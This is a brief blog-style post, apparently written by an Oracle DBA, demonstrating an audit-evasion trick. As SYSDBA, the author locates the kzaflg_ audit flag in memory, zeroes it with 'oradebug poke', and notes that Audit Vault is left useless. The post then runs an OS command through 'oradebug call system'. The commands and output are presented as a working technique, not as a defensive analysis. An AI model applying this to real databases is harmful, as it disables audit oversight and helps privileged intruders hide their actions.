the below is the demonstration :
sqlplus / as sysdba
SQL> — get the offset for oradebug
SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001SQL> show parameter audit;
NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDEDSQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
Just as note with oradebug you Audit vault become useless. another tricks that we can use oradebug to call Database command using OS 🙂
SQL> oradebug call system “ls -la >/tmp/hacktivity.txt”
Thank you
Osama mustafa